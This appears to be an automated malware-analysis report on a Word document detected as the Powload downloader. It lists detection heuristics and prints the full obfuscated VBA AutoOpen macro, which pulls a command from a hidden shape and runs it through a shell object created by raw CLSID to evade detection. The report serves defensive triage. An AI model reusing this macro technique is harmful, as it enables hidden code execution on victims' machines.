MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a critical heuristic firing for instantiating a dangerous COM class (WScript.Shell) via VBA, and another for invoking cmd.exe with execution flags. The AutoOpen VBA macro is present and appears to be heavily obfuscated, but the presence of WScript.Shell and cmd.exe suggests it's designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Powload-6770633-0' further supports this downloader functionality.
Heuristics 9
-
ClamAV: Doc.Downloader.Powload-6770633-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6770633-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904)) Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904)) Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10639 bytes |
SHA-256: f4a137dd333a87ad5646cf6c395099b84b2a116c5ccf0ffbfaa4fcd3e3e0c187 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
186 of 273 identifiers look randomly generated (e.g. 'BJcpJnozUIw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ukAOzli"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case QqGtA
Case 207479976
VlrZSE = 299451022
OtHVAF = dWLLzb
IjjMawl = 106745835
Case 107898840
vDuOdH = ChrW(93024130)
mhFDV = CDate(195219158)
wANkip = 211030311
End Select
tcLtGdwjw = 192601230 + CByte(awKBzOwJM - Sqr(WEKCCdwYj)) * YPLBlSOI - qBGabDN * zNVljTzW / CDate(158035072) * 2226809 * 281762672 / (25683830 - Sin(340286475))
On Error Resume Next
Select Case ArwIvkR
Case 338631635
wDfzkiM = 72369984
wjszESpc = irCvDz
HtBJibF = 190152885
Case 189045435
IHjii = ChrW(199161488)
wBQiDnfT = CDate(127773702)
mHZAAfZ = 191142474
End Select
LBAWiPUz = 62614654 + CByte(wjzNTzBj - Sqr(EFVqOESVC)) * IcGBt - hvfmSi * WmWnnuGAw / CDate(318811003) * 230042775 * 162051587 / (209649273 - Sin(276687884))
Set SvVKl = Shapes("BJcpJnozUIw")
On Error Resume Next
Select Case FiGJQh
Case 288977756
jRQjclJ = 148076343
lddloddSM = NwikEEW
tilquXtzk = 266433336
Case 27956869
iXwlEVhhQ = ChrW(6498867)
rDLiiwj = CDate(75445542)
FvQsGuj = 34385337
End Select
qtoNSopzw = 213291609 + CByte(WpYsAumj - Sqr(PzDdcpmHG)) * JmcoZHo - lXojBAb * PXYrM / CDate(54341683) * 341753871 * 78460309 / (192504251 - Sin(287886649))
On Error Resume Next
Select Case zHzcO
Case 170116777
COckLjw = 183115602
cGMOOdqzz = EZUBfoQnw
fidCzhSr = 79001614
Case 237505932
IitolD = ChrW(298629480)
TRAfPVDh = CDate(84578013)
wusBvUwcJ = 96865586
End Select
KwnNivva = 86018884 + CByte(lXzcOfwOh - Sqr(zFuPpYHiZ)) * ItiHITMSh - IHzCKXt * jpzOcSh / CDate(32776549) * 24001710 * 154392063 / (155105048 - Sin(64053165))
On Error Resume Next
Select Case KOYnfwG
Case 266083784
uumKN = 24655143
wbzVLdpQ = jXtpzs
aXNKrv = 237847499
Case 142496010
zJQnfSiEi = ChrW(52666106)
jHShZH = CDate(138690383)
YNwJCjMmA = 296866895
End Select
CribNUYcm = 106963144 + CByte(oGpfdSFfl - Sqr(aowjzzOH)) * fiLnFW - jENBi * fjYrTXCt / CDate(222129276) * 136328655 * 52533149 / (78930502 - Sin(183651928))
knNwZmwi = "" + IYmASkF + OUJVTkOd + QHHfr + wJDbdS + SvVKl.TextFrame.TextRange.Text + jOiHhB + qsrIPvR + jvQmH
On Error Resume Next
Select Case QqlTE
Case 13691448
fLDsK = 240126674
sWBKKXKR = HULdk
IUQrsaJiC = 86387499
Case 132090265
pYIiZT = ChrW(132381350)
PHFllzzhd = CDate(336713111)
YYnDicSrG = 233569995
End Select
zzqIUszY = 307663023 + CByte(JldBOfFvb - Sqr(FDUvqCV)) * GGcNObH - uccGi * EBPmK / CDate(9445290) * 130222222 * 322766912 / (85313016 - Sin(316452082))
On Error Resume Next
Select Case XbfKG
Case 229550800
aXsoqa = 138761056
uYNTsBbXT = GClqE
GwLtjA = 66764012
Case 261452801
qXLKkBvo = ChrW(109808961)
HODlFvE = CDate(75649913)
zffkT = 164590768
End Select
uPbQuNZf = 16229267 + CByte(PMiCLOV - Sqr(wFCKFz)) * oDoIKns - CHfNAjtp * jbjrcDn / CDate(114995652) * 71103498 * 132878537 / (148692652 - Sin(131476834))
On Error Resume Next
Select Case MjdKPh
Case 324258949
POaDS = 59726801
jMQHiZkSI = jOihLoiM
wJCYrLOWj = 315380887
Case 232992266
rdVBHwB = ChrW(165059207)
bQUXjTOb = CDate(26793207)
rrZMkjo = 166230317
End Select
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904))
Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case PBiPMJW
Case 273881768
wOsbtiYdX = 241284956
hSpjzJsMv = zGANoYZ
lnsJq = 148203443
Case 187634844
Zzaoj = ChrW(178687480)
zrzLBRD = CDate(111538328)
uWwHs = 87770190
End Select
FwZmz = 1811300 + CByte(cSEnjul - Sqr(rYcAV)) * MXlhWiPUZ - RMtUpK * jzUUszdT / CDate(146672095) * 158697408 * 266175597 / (206497103 - Sin(159619851))
On Error Resume Next
Select Case GTzzHQudM
Case 313537263
XGoDipYt = 217449229
kFDKRFc = brBVDum
poiiwdf = 108967385
Case 106092274
PGOzKiYP = ChrW(143443694)
vnpKSH = CDate(240142883)
hCDuQ = 86339930
End Select
kPwcHZnuf = 278259890 + CByte(IihXwnY - Sqr(ZCwTQrt)) * jNiUpBz - PZnOoIt * UvwGW / CDate(63763719) * 37667098 * 104100602 / (148367102 - Sin(293987940))
On Error Resume Next
Select Case HYwniqp
Case 273393421
BfraHhT = 289582338
wDToBKArT = JULARiDC
NGjfrCMqr = 199418622
Case 172197406
tHULsBS = ChrW(147140370)
nrXAfEqf = CDate(169150993)
EicinMYcm = 272326300
End Select
JMtKPM = 281274782 + CByte(ZdkjDaOM - Sqr(LzVLSiV)) * RdjzU - jjSdiip * sApAST / CDate(329469683) * 166520167 * 28896879 / (164722352 - Sin(1103234))
On Error Resume Next
Select Case fRJqz
Case 317260428
PwoHoR = 29145921
iwoZOV = GKCrd
LmbJjbIiw = 206475133
Case 140998007
CmDDQSh = ChrW(150352547)
JOUNlkYK = CDate(330711729)
ISQDMNwF = 276440469
End Select
pmTSEMjDC = 303491783 + CByte(KGICXGww - Sqr(kTwsMClir)) * SNrbwXvBJ - AVIEDwM * BoGCG / CDate(334052246) * 73689809 * 141895035 / (264502370 - Sin(178337277))
On Error Resume Next
Select Case HpPAmdu
Case 237100931
FEbzrpHa = 268183957
waPQQ = MwdALbSGO
QcMJlTo = 320990399
Case 63199282
FYJGkk = ChrW(97671471)
zvsYwBZj = CDate(108427481)
bdlUiWZi = 89482616
End Select
WclSHAtn = 259537524 + CByte(QaMiJTc - Sqr(iLjECFUfi)) * pnhGXjNU - ZRzHl * tTAQDLPth / CDate(1049347) * 16408803 * 314279488 / (121056263 - Sin(171274524))
Const jwpVzajEwiI = 0
On Error Resume Next
Select Case GKuFH
Case 149585934
wCmYGTjMv = 18810428
DpzRsf = zlbNvOT
ndPCUJnPb = 313275651
Case 105972853
bTrnc = ChrW(248453575)
ZpKoRPaJ = CDate(248136385)
iHXFJj = 21510892
End Select
siLQaXWcb = 20744940 + CByte(tnlJftH - Sqr(pwntzBw)) * nszRmoqjD - JOnRonX * rizwsLC / CDate(21162044) * 92264774 * 333237460 / (35697190 - Sin(267348103))
On Error Resume Next
Select Case jwfrI
Case 168108317
JDrPPz = 176677001
nQbKlvraH = DiAHwFfV
RZdJhjIO = 56432167
Case 254051211
fOmdqFlmS = ChrW(75215942)
YYEFuKCH = CDate(247762787)
tIJXKGtd = 192019402
End Select
inPHosWR = 282913251 + CByte(tDdcBE - Sqr(cmzLB)) * JmGcG - wrIpiFkJ * QColQRpqi / CDate(213955476) * 148378738 * 39480446 / (11448632 - Sin(115557953))
On Error Resume Next
Select Case wJumr
Case 79490895
UJcLPaOjw = 48060064
fZrFP = IjIdKp
AZkUToiE = 312159033
Case 13175631
ATQQEST = ChrW(170094731)
skHQq = CDate(301975105)
iIDTJTt = 77017648
End Select
quMHZFjXM = 34553900 + CByte(BripKkkqQ - Sqr(TdZMEv)) * iUjaEaNXG - jnAjEl * amdOIYjCv / CDate(165209733) * 155917143 * 115002528 / (257744718 - Sin(309065409))
KHwDwckDO.Run@ knNwZmwi, jwpVzajEwiI
On Error Resume Next
Select Case TEYbtTKp
Case 56244423
skEjlXnf = 320215791
UXDiaS = QPobMqnqL
KwEwfB = 236371283
Case 245646509
RacASIVrV = ChrW(321195658)
pAbWt = CDate(175714192)
EftRpZ = 60580020
End Select
jsWoVTz = 179606579 + CByte(WoOWS - Sqr(wStKYKXiD)) * hfFFz - DrpcdUjb * sZazFMzm / CDate(263825522) * 308428506 * 332966488 / (316605852 - Sin(96201009))
On Error Resume Next
Select Case EXLJoUOEv
Case 119584602
iREvJ = 196998000
jbINaSJi = nvqGj
OFdkCAjA = 244618140
Case 152930369
cHsXq = ChrW(330019154)
hvojrwt = CDate(342044482)
PbJFL = 129447707
End Select
DzSYbkzbX = 275420634 + CByte(qCqhwzR - Sqr(oufOjrC)) * UYbSoILoY - ZzzwNLB * DzPhiMn / CDate(254913395) * 206584977 * 8754585 / (160014467 - Sin(246573680))
On Error Resume Next
Select Case ZQMikFiKb
Case 148419186
CvaKzzvQK = 146293795
codlfhYVb = Tzruo
DBoJri = 42754228
Case 249235358
atZQZZFZi = ChrW(265558227)
AzaAlGu = CDate(259320132)
wiQLmrPW = 86496785
End Select
ziroE = 262025541 + CByte(ECiOXNFQJ - Sqr(anXkk)) * CzscNi - JjMZqpJL * NlBrJUa / CDate(135159969) * 70347871 * 304511946 / (186731742 - Sin(261176749))
On Error Resume Next
Select Case uiJEkVF
Case 45323015
osSZbz = 206892295
hmAfWzXl = VUrIq
AZwmqSW = 49778636
Case 138913993
GTJhBu = ChrW(274742262)
bzJSwY = CDate(247386274)
SbzkOHwV = 115740286
End Select
dMpVLifRP = 194654855 + CByte(DHbfhj - Sqr(NidZAEzuI)) * wwVnQCRd - GoimiII * PTYFhbG / CDate(53891224) * 231923011 * 142238564 / (22203487 - Sin(76883465))
On Error Resume Next
Select Case FMitkrVIf
Case 33761359
qvpIjoF = 273187723
hXjzwOKG = jDYwVpX
pSSQiGc = 159610001
Case 11817999
lAjCjQjJh = ChrW(190621806)
zWjOlwBz = CDate(308245926)
AlGwmWS = 19229902
End Select
HbuYZF = 277391457 + CByte(UIMMHuss - Sqr(mCtKaYGQl)) * aEwtQG - VGCzGI * PhrhNsqNF / CDate(278404705) * 237001508 * 108111729 / (63286372 - Sin(35981281))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.